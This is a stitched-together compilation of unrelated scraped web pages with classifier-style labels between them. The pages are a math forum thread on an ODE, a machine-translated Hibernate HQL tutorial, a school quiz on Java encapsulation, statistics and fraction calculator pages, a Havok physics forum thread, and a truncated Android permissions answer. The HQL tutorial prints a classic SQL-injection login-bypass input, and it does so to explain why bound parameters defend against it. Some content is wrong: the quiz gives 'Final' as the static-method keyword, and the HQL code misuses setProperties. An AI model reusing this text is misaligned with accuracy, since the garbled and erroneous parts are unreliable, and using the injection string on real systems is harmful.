1. Limited time only! Sign up for a free 30min personal tutor trial with Chegg Tutors Dismiss Notice Dismiss Notice Join Physics Forums Today! The friendliest, high quality science and math community on the planet! Everyone who loves science is here! Verify unsolvable ODE on Midterm 1. Nov 7, 2008 #1 Long story short, Professor was replaced with a replacement professor on the day of the midterm. The replacement prof. announces, after 3/4 of the time allowed has passed that the first question might contain a typo. He doesn't suggest how to fix the problem or anything. He just claims there might be a problem with the first question. Can someone take a look at it? This is for Ordinary Differential Equations I Here is the first question: Solve the initial value problem: y' ' ' + y' ' + 4y' + 4 = 0 y (0) = 5; y' (0)=7; y' ' (0)= -5; Thank you very much   2. jcsd 3. Nov 7, 2008 #2 gabbagabbahey User Avatar Homework Helper Gold Member I don't think there is any typo, it seems easily solvable to me; just use the method of undetermined coefficients, you have a fairly simple 3rd degree inhomogeneous ODE.   4. Nov 7, 2008 #3 y' ' ' + y' ' + 4y' + 4 = 0 would be come y' ' ' + y' ' + 4y' = -4 m^3 + m^2 + 4m = 0 m(m^2 + m + 4) = 0 m1 = 0 and m2 = a complex root is that right?   5. Nov 7, 2008 #4 gabbagabbahey User Avatar Homework Helper Gold Member That looks like a good start for your complimentary solution.What form does that portion of your solution take?   6. Nov 7, 2008 #5 Hmm... e^a(c1cos(bx)+c2sin(bx))   7. Nov 7, 2008 #6 gabbagabbahey User Avatar Homework Helper Gold Member That's part of it, what are the values of 'a' and 'b', and what happened to your m1=0 root?   8. Nov 7, 2008 #7 a would be -1/2 and b sqrt(15)/2 We have never seen the case were m1 and m2 are real and complex.. Where would I go from here?   9. Nov 7, 2008 #8 gabbagabbahey User Avatar Homework Helper Gold Member a real root m1 just adds an c3*e^(m1 x) term, in this case m1=0 and e^0=1, so it adds a constant term and your complimentary solution is: [tex]y_c(x)=e^{\frac{-x}{2}} \left( c_1 cos \left( \frac{\sqrt{15}}{2} x \right)+c_2 sin \left(\frac{\sqrt{15}}{2} x \right) \right) +c_3[/tex] Do you follow?   10. Nov 7, 2008 #9 Yes, I follow... Where would I go from here?   11. Nov 7, 2008 #10 gabbagabbahey User Avatar Homework Helper Gold Member Now you need to find a particular solution....Your inhomogeneous term is just '-4'. Suppose you had only a second order ODE, what would you guess as a particular solution there? Can you guess the form of a particular solution for the 3rd order ODE?   12. Nov 7, 2008 #11 Ok I get it from this point on, however, weve never really had any practice with m1 = 0 and m2 = complex I wonder why the prof said it was a typo now.. lol..   13. Nov 7, 2008 #12 gabbagabbahey User Avatar Homework Helper Gold Member maybe because he thought that the sqrt(15)/2 was a little too ugly for an exam question, but who knows :shrug:   14. Nov 7, 2008 #13 We weren't allowed calculators.. I don't think that changes much though   15. Nov 7, 2008 #14 gabbagabbahey User Avatar Homework Helper Gold Member My guess is your replacement prof didn't have his morning coffee, and made an error in his attempt to solve the problem, and couldn't find it so he concluded something might b wrong with the question. But that's just speculation on my part :smile:   16. Nov 7, 2008 #15 HallsofIvy User Avatar Staff Emeritus Science Advisor He probably looked at y' ' ' + y' ' + 4y' + 4 = 0 and thought perhaps it should be y' ' ' + y' ' + 4y' + 4y = 0 which would be more "standard form" but distinctly harder than the original problem!   Know someone interested in this topic? Share this thread via Reddit, Google+, Twitter, or Facebook Similar Discussions: Verify unsolvable ODE on Midterm 1. An ODE (Replies: 4) 2. Unsolvable PDE? (Replies: 1) 3. Midterm Review (Replies: 6) Loading...
__label__pos
0.892779
hql statement examples and detailed explanations (Reprinted) HQL query HQL query: Criteria queries conducted on the query object-oriented package with programmers way of thinking, but the HQL (Hibernate Query Lanaguage) queries to provide a more rich and flexible query characteristics, Hibernate HQL query approach will be established as the official recommended standard query methods, HQL query in Query Criteria include all the features of the premise, provides a standard SQL statement similar to queries, while also providing a more Plus object-oriented package. The complete situation HQL statement as follows: Select / update / delete ... ... from ... ... where ... ... group by ... ... having ... ... order by ... ... asc / desc One of the update / delete for the Hibernate3 in the newly added features, see HQL query is very similar to standard SQL queries. Hibernate HQL query as a whole entity in the core operating system status, this section I Will be dedicated to operations around the HQL specific technical details to explain. 1, entity query: The entity query technology, in fact, we have had in the previous involved, such as the following example: String hql = "from User user"; List list = session.CreateQuery (hql). List (); Result of the above code execution, query the User entity object corresponding to all the data, and data encapsulated in User entity object, and returned into the List. It should be noted that, Hibernate entities check There is consultation on the inheritance of the judge, such as we discussed earlier, mapping entity inheritance relations Employee entity object, it has two sub-classes are HourlyEmployee, SalariedEmployee, if there is such HQL statement: "from Employee", the time when the implementation of the search will retrieve all Employee Hibernate entity object type corresponding to the data (including its subclasses HourlyEmployee, SalariedEmployee corresponding Data). Because HQL statement similar to the standard SQL statements, so we can use in the HQL statement where the words and where words can be used in a variety of expressions, comparison operators and the use of "and", "or" connection Different query combinations. See the following simple example: from User user where user.age = 20; from User user where user.age between 20 and 30; from User user where user.age in (20,30); from User user where user.name is null; from User user where user.name like '% zx%'; from User user where (user.age% 2) = 1; from User user where user.age = 20 and user.name like '% zx%'; 2, update and delete entities: Continues to explain other, more powerful query HQL function, we first carried out to explain the following entities using HQL update and delete technology. The technology function is Hibernate3 new features added in Hibernate2 Is not available. For example, in Hibernate2, if we want the database to all users of the age of 18 years to 20 years old all, then we have to first 18 years of age out of the user search and then their Modify the age of 20 years, the last call Session.update () statement is updated. On this issue in Hibernate3 provides a more flexible and more efficient solutions, such as the following code: Transaction trans = session.beginTransaction (); String hql = "update User user set user.age = 20 where user.age = 18"; Query queryupdate = session.createQuery (hql); int ret = queryupdate.executeUpdate (); trans.commit (); In this way we can in Hibernate3, the one-time bulk data to complete the update, the performance improvement is quite substantial. Also can delete a similar manner to complete the operation, such as the following code : Transaction trans = session.beginTransaction (); String hql = "delete from User user where user.age = 18"; Query queryupdate = session.createQuery (hql); int ret = queryupdate.executeUpdate (); trans.commit (); If you are reading of chapters one by one, then you will remember me in the second part of the bulk data manipulation of discourses, the discussion of this mode of operation, this mode of operation referred to as bulk in Hibernate3 delete / update, this approach can significantly improve the operation of the flexibility and efficiency, but using this approach is likely to cause a buffer synchronization of Problem (please see discussion). 3, attribute query: Very often, we retrieve the data, does not need physical objects corresponding to all the data, but only part of the object needs to retrieve physical properties of the corresponding data. This time we can use HQL query technology attributes , Such as the following program example: List list = session.createQuery ("select user.name from User user"). List (); for (int i = 0; i <list.size (); i + +) ( System.out.println (list.get (i)); ) We only retrieve the User entity name attribute corresponds to the data, then return to the list containing the result set for each entry is of type String name attribute corresponds to the data. We can also search more than one property, If the following procedures: List list = session.createQuery ("select user.name, user.age from User user"). List (); for (int i = 0; i <list.size (); i + +) ( Object [] obj = (Object []) list.get (i); System.out.println (obj [0]); System.out.println (obj [1]); ) At this point in the returned result set list, each entry is contained in an Object [] type, which contains the corresponding attribute data values. Today our generation as well the ideological influence of object-oriented developers, may Will find the above to return Object [] not meet the object-oriented style, then we can use HQL to provide examples of the dynamic structure function data on these flat packages, such as the following code: List list = session.createQuery ("select new User (user.name, user.age) from User user"). List (); for (int i = 0; i <list.size (); i + +) ( User user = (User) list.get (i); System.out.println (user.getName ()); System.out.println (user.getAge ()); ) Here we construct an instance of an object through dynamic, on a package to return the results to make our program more in line with the object-oriented style, but there is a problem here, is important to note that the User object returned by this time, Merely an ordinary Java object to, in addition to the value of query results, the other attribute values are null (including the primary key id), that can not implement this object Session object persistence update parade For. Such as the following code: List list = session.createQuery ("select new User (user.name, user.age) from User user"). List (); for (int i = 0; i <list.size (); i + +) ( User user = (User) list.get (i); user.setName ("gam"); session.saveOrUpdate (user); / / here will be the practical implementation of a save operation, but does not perform update operations, because the User object's id property to null, Hibernate will it as a freedom Like (please refer to the persistent object state part of the paper), so would save operation it performs. ) 4, grouping and sorting A, Order by clause: And the SQL statement similar to, HQL queries can also order by clause to sort the query result set, and can be sorted asc or desc keywords specified ways, such as the following code: from User user order by user.name asc, user.age desc; HQL query above, will name attribute in ascending order, descending sort attributes to age, but with the same SQL statement, the default sort is asc, or ascending order. B, Group by clause and statistical inquiry: HQL statement in the same group by clause groups support the use of inquiry, also supports the group by clause combined with aggregate functions with statistical queries, most of the standard SQL aggregate functions can be used in the HQL statement, such as: count (), sum (), max (), min (), avg () and so on. Such as the following code: String hql = "select count (user), user.age from User user group by user.age having count (user)> 10"; List list = session.createQuery (hql). List (); C, optimization of statistical inquiry: Suppose we now have two database tables, each table is the customer and order table, which is structured as follows: customer ID varchar2 (14) age number (10) name varchar2 (20) order ID varchar2 (14) order_number number (10) customer_ID varchar2 (14) There are two HQL query, as follows: from Customer c inner join c.orders o group by c.age; (1) select c.ID, c.name, c.age, o.ID, o.order_number, o.customer_ID from Customer c inner join c.orders c group by c.age; (2) These two statements using the HQL statement in connection query (HQL statement that we will be devoted to the query part of the connection), now we can see the last two query results returned are the same, but they In fact, there is a clear distinction between statements (1) search results will be returned to Customer and Order objects persistent, and they will be placed into Hibernate's Session cache, and the Session will be responsible for them in the cache The uniqueness and data synchronization with back-end database, and only after the submission of their affairs will be removed from the cache; the statement (2) returns the relational data rather than persistent objects, so they will not take up Hibernate's Session cache, as long as the search after the application is not access them, they are occupied by JVM's memory is likely to be garbage collected, and the Hibernate does not synchronize their changes. In our system development, especially Mis system is inevitable to the development of statistical inquiry, such function has two features: the first volume of data; the second operation under normal circumstances are read-only and will not involve to the right system Meter data changes, then if a query using the first approach will inevitably lead to a large number of persistent objects in Hibernate's Session cache, and Hibernate's Session cache and data but also for their Database data synchronization. If the second query by way of, obviously it will improve query performance, because no Hibernate, Session cache management overhead, and long as the application Chengxubuzai use these Shuju, it Were occupied by the release of memory space will be recovered. Therefore, development of statistical query system, try to use the written statement required by select query to return the way the properties of relational data, and ways to avoid using the first query to return persistent objects (in this way is in a More suitable for use when demand changes), so you can improve operational efficiency and reduce memory consumption. Body of the real master is not fluent in all, but proficient in the right places with the appropriate means. 5, parameter binding: Hibernate dynamic query parameter binding on providing a wealth of support, then what is the query parameters dynamically bind it? In fact, if we are familiar with the traditional JDBC programming, we not difficult to understand the query parameters dynamic binding, The following code in the traditional JDBC bind parameters: PrepareStatement pre = connection.prepare ("select * from User where user.name =?"); pre.setString (1, "zhaoxin"); ResultSet rs = pre.executeQuery (); Also provided in the Hibernate query parameters like this binding function, but also on the Hibernate features than the traditional JDBC Operation provides rich multi-features, the existence of four kinds of parameters Hibernate bind the CPC In the manner, we will introduce the following: A, binding by parameter name: Defined in the HQL statement named parameters use ":" at the beginning of the form as follows: Query query = session.createQuery ("from User user where user.name =: customername and user.customerage =: age"); query.setString ("customername", name); query.setInteger ("customerage", age); The code above: customername and: customerage customername named parameters are defined and customerage, then use the Query interface setXXX () method to set name of the parameter values, setXXX () Method package With two parameters, namely, the name of named parameters and named parameters of the actual value. B, position by bonding parameters: Used in the HQL query "?" To define the parameters of location, format is as follows: Query query = session.createQuery ("from User user where user.name =? And user.age =?"); query.setString (0, name); query.setInteger (1, age); Use the same setXXX () method to set bind parameters, but this time setXXX () method of the first argument on behalf of bonding parameters appear in the HQL statement, the position number (from 0 starting number), the second argument still behalf of the Senate Actual value. Note: In the actual development, the state will promote the use of named parameters by name, because it not only provides a very good program readability, but also to improve the program's ease of maintenance, because when the query parameters of the position is changed , By name naming parameters in the way state does not require adjustment of program code. C, setParameter () method: In Hibernate's HQL query by setParameter () method of bonding parameters of any type, the following code: String hql = "from User user where user.name =: customername"; Query query = session.createQuery (hql); query.setParameter ("customername", name, Hibernate.STRING); Code as shown above, setParameter () method contains three parameters, namely the name of named parameters, named parameters of the actual value, and name the parameter mapping type. For some parameter type setParameter () method More parameter values to Java types, guess the corresponding mapping type, so this time do not need to write a map type display, such as the above example, can write: query.setParameter ("customername", name); but for some types of maps must indicate the type, such as java.util.Date type, because it corresponds to a variety of Hibernate mapping types, such as Hibernate.DATA or Hibernate.TIMESTAMP. D, setProperties () method: In Hibernate you can use the setProperties () method, named parameters with an object tied to property values, as follows code: Customer customer = new Customer (); customer.setName ("pansl"); customer.setAge (80); Query query = session.createQuery ("from Customer c where c.name =: name and c.age =: age"); query.setProperties (customer); setProperties () method will automatically be customer object instance property value to the named parameters match, but the requested named parameter name must be the appropriate entity object attributes with the same name. There is also a special setEntity () method, which will name the parameters associated with a persistent object, as shown in the following code: Customer customer = (Customer) session.load (Customer.class, "1"); Query query = session.createQuery ("from Order order where order.customer =: customer"); query. setProperties ("customer", customer); List list = query.list (); The above code will be generated similar to the following SQL statement: Select * from order where customer_ID = '1 '; E, the advantages of using the binding parameters: Why do we use the binding named parameters? The existence of any one thing all have their value, specific to the binding parameters for the HQL query, the main there are two main advantages: ① , can be implemented using database performance optimization, because Hibernate is using a PrepareStatement at the bottom to complete the query, so the same parameters for different SQL syntax statements, can be To take advantage of pre-compiled SQL statement cache, so as to enhance query efficiency. ② , can prevent SQL Injection vulnerabilities arise: SQL Injection is a specially assembled for the attack SQL statement, such as our common user login, the login screen, users enter a user name and password, then login verification process may be generated as Under the HQL statement: "From User user where user.name = '" + name + "' and user.password = '" + password + "'" The HQL statement is logically no problems, this login authentication in general is done correctly, but if the user name when logging in, type "zhaoxin or 'x' = 'x", Then using a simple HQL statement if the string assembly, it will generate the following HQL statement: "From User user where user.name = 'zhaoxin' or 'x' = 'x' and user.password = 'admin'"; Obviously this HQL statement of where the words will always be true, Er Shi meaningless role of the user password, which is the basic principle of SQL Injection attacks. Way to use bound parameters, we can properly deal with this problem, when using the binding parameters, will be the following HQL statement: from User user where user.name =''zhaoxin''or''x =''x'''and user.password =' admin '; can be seen using the binding parameters will enter the user name in single quotes Solutions Analysis of a string (if you want to include single quotes in the string should be used to repeat the form of single quotation marks), so the parameter binding to prevent SQL Injection vulnerabilities. 分类:Java 时间:2010-08-26 人气:264 分享到: blog comments powered by Disqus 相关文章 • oracle restore accidentally deleted data, unlock the other sql statements 2010-04-27 1. Have accidentally developed delete all on database table, then threatened to death. We found the following statement to one hour to restore the data before! Very simple. Note that using the administrator login system: select * from table name as o • [Summary] oracle restore accidentally deleted data, unlock the other sql statements (switch) 2010-04-28 Transfer from: http://www.javaeye.com/topic/648858 1. Who do not care development on database table to delete all, was scared to death. We found the following statement to one hour to restore the data before! Very simple. Note that using the administ • In-depth performance tuning SQL statements 2011-05-17 This example sqlserver Some programmers to write database applications, often focusing on the use of OOP and a variety of framework, but it ignores the basic SQL statement and its "performance (performance) optimization" problem. Had heard of a • Linux operating system upstart MeeGo 2010-03-25 March 13, 2010 In the just-concluded World Mobile Congress 2010 in Barcelona, Linux operating system family of intelligent merging the two forces, that Intel's Moblin and Nokia's Maemo, the merger enabled the new name MeeGo, and management by the Lin • Write high-performance methods of SQL statements 35 2010-09-07 (1) integration of simple, non-associated database access: If you have a few simple database queries, you can put them into a query (even if no relationship between them) (2) to remove duplicate records: The most efficient way to delete duplicate rec • Linux Learning - the first day - what is the operating system? 2011-06-30 Chapter What is Linux What is Linux 1.1 1.1.1 Computer: calculation aids Computer must have the components: Input unit: such as a mouse, keyboard, card reader machine, and so on. Central processing unit (CPU): contains the arithmetic logic, control, • SQL statements to manipulate the collection 2011-04-22 // Keep a small number of decimal places select cast( Column name as a numeric type , Such as decimal,numeric, ( Length, number of digits after the decimal point )) Column name from the table name Case study :select cast(Sid as decimal(18,2)) Sid fro • Google Tablet PC operating system, a prototype map interface 2010-03-31 Google Chromium official website of the Tablet PC operating system interface diagram U.S. technology blog site TechCrunch that, Chrome OS Tablet PC operating system interface map from Google Chrome seems to be the designer Glen Murphy (Glen Murphy) h • Hibernate query object Expression package introduced 2009-08-20 Criteria Query is provided by the Hibernate object-oriented SQL statement expressed in a way. When we approach the use of JDBC to query the data will be written like this: select NAME FROM EMPLOYEE where ID ='001 ' Criteria Query using Hibernate mode • Study concluded nine Lucene: Lucene query object (1) transfer 2010-06-08 In addition to supporting other Lucene query syntax, you can construct your search query object. From the previous section of the Lucene's syntax chapter can know, with the corresponding query object query are: BooleanQuery, FuzzyQuery, MatchAllDocsQ iOS 开发 Android 开发 Python 开发 JAVA 开发 开发语言 PHP 开发 Ruby 开发 搜索 前端开发 数据库 开发工具 开放平台 Javascript 开发 .NET 开发 云计算 服务器 Copyright (C) codeweblog.com, All Rights Reserved. CodeWeblog.com 版权所有 黔ICP备15002463号-1 processed in 0.400 (s). 12 q(s)
__label__pos
0.980808
Encapsulation Class 10 Computer Applications Chapter 6 Encapsulation Important Questions Exam preparation with oswal.ioExam preparation with oswal.io Provided here are class 10 Encapsulation important questions and answers. Crafted meticulously, these questions aim to strengthen students' grasp of fundamental concepts from earlier classes. Embracing various question formats, these exercises focus on consolidating core principles, addressing uncertainties, and refining problem-solving skills. By engaging with these inquiries, students can fortify their preparation for exams, boost confidence, and polish essential proficiencies vital for excelling in the ICSE Class 10 Computer Applications Examination." Introduction Encapsulation chapter of Class 10 Computer Applications delves into the concept of Encapsulation, a fundamental aspect of object-oriented programming. Encapsulation involves bundling data (attributes) and the methods (functions) that manipulate the data into a single unit, known as a class. This encapsulation ensures that the internal workings of an object are hidden from the outside world, allowing controlled access to data, promoting security, and facilitating efficient code management. Solving ICSE class 10 computer important questions will help students understand the concepts better. What are Encapsulation? Encapsulation is a fundamental principle in object-oriented programming (OOP) where the data (variables) and the methods (functions) that operate on the data are bound together within a single unit known as a class. Solving  Encapsulation important questions for class 10 ICSE  essential for a comprehensive understanding and successful examination preparation. Explore further with oswal.io  for ICSE class 10 important questions 2023-24  to strengthen your knowledge in these fundamental areas of computer. important questions for class 10 computer icse Class 10 Encapsulation Important Questions and Answers Q1. What is the proper access specifier for data members of a class? Options (a) Private (b) Default (c) Protected (d) Public Ans. (a) Private Explanation: All the data members should be made private to ensure the highest security of data. In special cases we can use public or protected access, but it is advised to keep the data members private always. Q2. ___________ keword is used while creating a static method. Options (a) Static (b) Final (c) Instance (d) Nostat Ans. (b) Final Explanation: A static method definition must start with the static keyword. Q3. What is meant by private visibility of a method ? Explanation: Private methods can be used in the class in which they are defined. Outside that class they cannot be accessed. Q4. Differentiate between private and protected visibility modifiers. Explanation: Private is the most restricted access specifier which is accessible only in its own class.Protected members are accessible by the classes of the same package or by a child class in any other package. Q5. In the program given below, state the name and the value of the: (i) method argument or argument variable. (ii) class variable. (iii) local variable. (iv) instance variable       class myClass.       {             static int x = 7;             int y = 2;             public static void main(String args[])             {                   myClass obj = new myClass();                   System.out.println(x);                   obj.sampleMethod(5);                   int a = 6;                   System.out.println(a);             }                   void sampleMethod(int n)             {                   System.out.println(n);                   System.out.println(y);             }       } Explanation: (i) int n; (argument variable) (ii) x = 7; (class variable) (iii) a = 6; (local variable) (iv) y = 2; (instance variable) important questions for class 10 icseimportant questions for class 10 computer icse ICSE Class 10 Computer Applications Chapter wise Important Questions Chapter No. Chapter Name Chapter 1 Revision of Class IX Syllabus Chapter 2 Class as a Basis of all Computation Chapter 3 User - defined Methods Chapter 4 Constructors Chapter 5 Library classes Chapter 6 Encapsulation Chapter 7 Arrays Chapter 8 String handling Conclusion The exploration of Encapsulation in Chapter 6 of Class 10 Computer Applications provides a crucial understanding of object-oriented programming. By encapsulating data and methods within a class, students acquire a robust foundation in securing data integrity, enhancing code organization, and fostering modular programming. If you are looking to further practice and enhance your understanding of the concepts discussed in the chapter, oswal.io provides a comprehensive set of class 10 Encapsulation important questions and answer for understanding the concept in a better way. Frequently Asked Questions Q1 : What is Encapsulation in Object-Oriented Programming? Ans:  Encapsulation is the mechanism of bundling data (attributes) and methods (functions) that manipulate the data into a single unit (class). Q2 : How does Encapsulation Achieve Data Security? Ans:  Encapsulation restricts access to certain components within a class, enabling data hiding and protecting it from unwanted access or modification. Q3 : Why is Encapsulation Important in Software Development? Ans: Encapsulation promotes code organization, modularity, and better maintainability by hiding the internal workings of an object and exposing only necessary functionalities. Q4 : How Does Encapsulation Differ from Abstraction? Ans: Encapsulation focuses on bundling data and methods together, while abstraction emphasizes showing only the essential features of an object and hiding its complexity. Q5 : Can Encapsulation Enhance Security in Software Systems? Ans: Yes, encapsulation can improve security by preventing unauthorized access to sensitive data and ensuring that data can only be manipulated through controlled methods. Copyright 2022 OSWAL PUBLISHERS Simplifying Exams Phone:  (+91) 78959 87722 Mail: [email protected] Company Our Policy • Privacy policy • Terms & Conditions Follow Us facebook icontwitter iconInstagram iconyoutube iconlinkedIn iconwhatsapp icon Lets Connect ©Copyright 2022 OSWAL PUBLISHERS Simplifying Exams Thank you! Your submission has been received! Oops! Something went wrong while submitting the form.
__label__pos
0.999855
Chi-Square test for One Pop. Variance Instructions: This calculator conducts a Chi-Square test for one population variance (\(\sigma^2\)). Please select the null and alternative hypotheses, type the hypothesized variance, the significance level, the sample variance, and the sample size, and the results of the Chi-Square test will be presented for you: Ho: \(\sigma^2\) \(\sigma_0^2\) Ha: \(\sigma^2\) \(\sigma_0^2\) Hypothesized Variance (\(\sigma_0^2\)) Sample Variance (\(s^2\)) Sample Size (n) Significance Level (\(\alpha\)) Chi-Square test for One Population Variance More about the Chi-Square test for one variance so you can better understand the results provided by this solver: A Chi-Square test for one population variance is a hypothesis that attempts to make a claim about the population variance (\(\sigma^2\)) based on sample information. The test, as every other well formed hypothesis test, has two non-overlapping hypotheses, the null and the alternative hypothesis. The null hypothesis is a statement about the population variance which represents the assumption of no effect, and the alternative hypothesis is the complementary hypothesis to the null hypothesis. The main properties of a one sample Chi-Square test for one population variance are: • The distribution of the test statistic is the Chi-Square distribution, with n-1 degrees of freedom • The Chi-Square distribution is one of the most important distributions in statistics, together with the normal distribution and the F-distribution • Depending on our knowledge about the "no effect" situation, the Chi-Square test can be two-tailed, left-tailed or right-tailed • The main principle of hypothesis testing is that the null hypothesis is rejected if the test statistic obtained is sufficiently unlikely under the assumption that the null hypothesis is true • The p-value is the probability of obtaining sample results as extreme or more extreme than the sample results obtained, under the assumption that the null hypothesis is true • In a hypothesis tests there are two types of errors. Type I error occurs when we reject a true null hypothesis, and the Type II error occurs when we fail to reject a false null hypothesis The formula for a Chi-Square statistic is \[\chi^2 = \frac{(n-1)s^2}{\sigma^2}\] The null hypothesis is rejected when the Chi-Square statistic lies on the rejection region, which is determined by the significance level (\(\alpha\)) and the type of tail (two-tailed, left-tailed or right-tailed). To compute critical values directly, please go to our Chi-Square critical values calculator log in to your account Don't have a membership account? REGISTER reset password Back to log in sign up Back to log in
__label__pos
0.959569
What is 19/55 as a percentage? It's very common when learning about fractions to want to know how convert a fraction like 19/55 into a percentage. In this step-by-step guide, we'll show you how to turn any fraction into a percentage really easily. Let's take a look! Want to quickly learn or show students how to convert 19/55 to a percentage? Play this very quick and fun video now! Before we get started in the fraction to percentage conversion, let's go over some very quick fraction basics. Remember that a numerator is the number above the fraction line, and the denominator is the number below the fraction line. We'll use this later in the tutorial. When we are using percentages, what we are really saying is that the percentage is a fraction of 100. "Percent" means per hundred, and so 50% is the same as saying 50/100 or 5/10 in fraction form. So, since our denominator in 19/55 is 55, we could adjust the fraction to make the denominator 100. To do that, we divide 100 by the denominator: 100 ÷ 55 = 1.8181818181818 Once we have that, we can multiple both the numerator and denominator by this multiple: 19 x 1.8181818181818 / 55 x 1.8181818181818 = 34.545454545455 / 100 Now we can see that our fraction is 34.545454545455/100, which means that 19/55 as a percentage is 34.5455%. We can also work this out in a simpler way by first converting the fraction 19/55 to a decimal. To do that, we simply divide the numerator by the denominator: 19/55 = 0.34545454545455 Once we have the answer to that division, we can multiply the answer by 100 to make it a percentage: 0.34545454545455 x 100 = 34.5455% And there you have it! Two different ways to convert 19/55 to a percentage. Both are pretty straightforward and easy to do, but I personally prefer the convert to decimal method as it takes less steps. I've seen a lot of students get confused whenever a question comes up about converting a fraction to a percentage, but if you follow the steps laid out here it should be simple. That said, you may still need a calculator for more complicated fractions (and you can always use our calculator in the form below). If you want to practice, grab yourself a pen, a pad, and a calculator and try to convert a few fractions to a percentage yourself. Hopefully this tutorial has helped you to understand how to convert a fraction to a percentage. You can now go forth and convert fractions to percentages as much as your little heart desires! Cite, Link, or Reference This Page If you found this content useful in your research, please do us a great favor and use the tool below to make sure you properly reference us wherever you use it. We really appreciate your support! • "What is 19/55 as a percentage?". VisualFractions.com. Accessed on March 31, 2023. http://visualfractions.com/calculator/fraction-as-percentage/what-is-19-55-as-a-percentage/. • "What is 19/55 as a percentage?". VisualFractions.com, http://visualfractions.com/calculator/fraction-as-percentage/what-is-19-55-as-a-percentage/. Accessed 31 March, 2023. • What is 19/55 as a percentage?. VisualFractions.com. Retrieved from http://visualfractions.com/calculator/fraction-as-percentage/what-is-19-55-as-a-percentage/. Fraction to Percentage Calculator Fraction as Percentage Enter a numerator and denominator Next Fraction to Percentage Calculation
__label__pos
0.572226
hkpPhysicsSystem.clone() crash! hkpPhysicsSystem.clone() crash! Ritratto di kevin_lee Hi, I encountered a strange errors when I'm trying to import .hkx file into engine. In my engine, I wanna generate .hkx file for each actor, when loading the actor, I load the corresponding physics data. So every time I initialize the actor's physics' data, I'm trying to clone the physics system in .hkx file. But when the constraints constraint to the world, the errors pop up "Rigidbodies are referenced by a constraint in the physics system that are not in the physics' system." How can I fix this error? Or is there any better way to import the physics' data into my own actors? Pls anybody help me out! 9 post / 0 new Ultimo contenuto Per informazioni complete sulle ottimizzazioni del compilatore, consultare l'Avviso sull'ottimizzazione Ritratto di havokdaniel Hi Kevin, It is not possible to clone constraints which are constrained to the world right now. This is a known issue and a fix is in progress. I do not know when it will be complete though. For the meantime you can try using hkpConstraintInstance::setFixedRigidBodyPointersToZero() on everything in hkpPhysicsSystem::getConstraints() to make sure there are no invalid references. Let me know if you have any trouble getting this going. Thanks, Daniel Ritratto di kevin_lee Thank you very much, Daniel! I'll try the functions you mentioned. Hope you guys will fix this soon. It's anoying without this support. Ritratto di kevin_lee Hi Daniel, I used the functions you mentioned before. It didn't work. Still get the error message! Maybe I should tell you more about our situation, then you can give me some suggestions. We wanna use Havok Content Tool to create some physics objects attached to our own actors. Each our own actor has their own data file. So we wanna export these physics objects data file .hkx for each actor. When we add the actor into the scene, if it's the first time adding this actor, then we'll import the .hkx file, and clone the physics system in physics data. Each time we wanna create an instance of this actor, we just need to clone the physics system and add them into the world. If the bug can't be fixed right now, any suggestions can you give us? Ritratto di havokdaniel Hi Kevin, Can you try cloning the physics system and before adding to the world, debug into hkpPhysicsSystem::getConstraints() and check that neither hkpConstraintInstance::m_entities[0] nor hkpConstraintInstance::m_entities[1] are hkpWorld::getFixedRigidBody() ? Also, could you explain how you're adding the cloned physics system to the world? Thanks, Daniel Ritratto di kevin_lee Hi Daniel, I checked all the constraints in the physics system, if there's one entity pointer is NULL, then when I clone the physics system, I got the Assert failure message:" Rigidbodies are referenced by a constraint in the physics system that are not in the physics sytem." If there's no constraints constraint to the world, there's no such error messages, and I will change the rigidbodies' positions according to my own actors. Then add the physics system into the world. The problem occurs when I cloning the physics system. Adding them into the world is OK. After all these failures, now I use another way to solve this problem: when I found there's some entity pointers are NULL, I reload the .hkx file. And I didn't clone them, just added them into the world. It's ugly. But it worked. And I got another problem: how can I change the constraints' position? I mean, when the constraint constrainted to the world, I need to change the fixed point sometime before I adding them into the world. From the demos and the headers, I can't find any functions can help me do this kind of job! I can change the position of the rigidbodies, but the constraints didn't go with them. Can you give me any sugestions? Thanks for your quickly reply! Kevin Ritratto di havokdaniel Hi Kevin, Glad you got a workaround to that problem. Unfortunately the only way to move a constraint like that is to get at the constraint data. This is a different for every constraint type so you'll have to check which type of constraint you're dealing with, then get the constraint data, cast it to the correct constraint data type, and modify that. What you're looking for is in Havok 6.0 (hkpPhysicsSystem::transform()) but we don't have the free SDK version released yet. I haven't have a chance to implement this code myself but I think you'll need to do something like if (constraintInstance->getData()->getType() == hkpConstraintData::CONSTRAINT_TYPE_BALLANDSOCKET) { hkpBallAndSocketConstraintData* ballSocketData = static_cast(data); // Grab the transforms of constraintInstance->getEntityA and constraintInstance->getEntityB, transform them, and do // ballSocketData->setInWorldSpace() with the new positions. } else if (constraintInstance->getData()->getType() == hkpConstraintData::CONSTRAINT_TYPE_HINGE) { // Do the same for this type of constraint instance... } Hope this puts you on the right track, Daniel Ritratto di kevin_lee Hi Daniel, It's great to hear that there's a function can do this job. So when I get the Havok 6.0 lisence, the job will be very easy. I've implemented this in the same way you talked about. Thanks! I notice that some wierd thing happen to capsule, when you hit it. Not so realistic. The ragdoll is OK, but the single capsule seems a little bit wierd. Is that a bug or something? Kevin Ritratto di sean.thurston Hi Kevin, In what context are you using the capsule? Is it just a general capsule rigid body? Does it have constraints attached to it? What kind of "weirdness" are you experiencing? If you had some more information that would definitely help us understand the issue. Thanks, Sean Developer Support Engineer Havok www.havok.com Accedere per lasciare un commento.
__label__pos
0.679877
4 Estou com um problema nas api 23+ do google especificamente no método mapa.setMyLocationEnabled(true); Necessita de permissão para executar e, no android 6.0+, eu não consigo implementar o novo método de permissões. @Override public void onMapReady(GoogleMap googleMap) { mapa = googleMap; mapa.setOnCameraChangeListener(getCameraChangeListener()); verificaConexao(); Toast.makeText(getActivity(), "versão 0.007", Toast.LENGTH_SHORT).show(); try { mapa.setMyLocationEnabled(true); locationManager = (LocationManager) getActivity().getSystemService(Context.LOCATION_SERVICE); locationManager.requestLocationUpdates( LocationManager.GPS_PROVIDER, TEMPO_MINIMO_UPDATE, DISTANCIA_MINIMA_PARA_UPDATE, new MyLocationListener() ); //LocationManager.NETWORK_PROVIDER ou LocationManager.GPS_PROVIDER ou LocationManager.PASSIVE_PROVIDER } catch (SecurityException ex) { Toast.makeText(getActivity(), "Minha localização entrou em catch" + ex, Toast.LENGTH_LONG).show(); } 4 Se o aplicativo precisa acessar a localização do usuário, é necessário solicitar permissão adicionando a permissão de localização do Android relevante ao aplicativo. Adicione as permissões ao manifesto do aplicativo <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> Solicitar permissões em tempo de execução O Android 6.0 (Marshmallow) 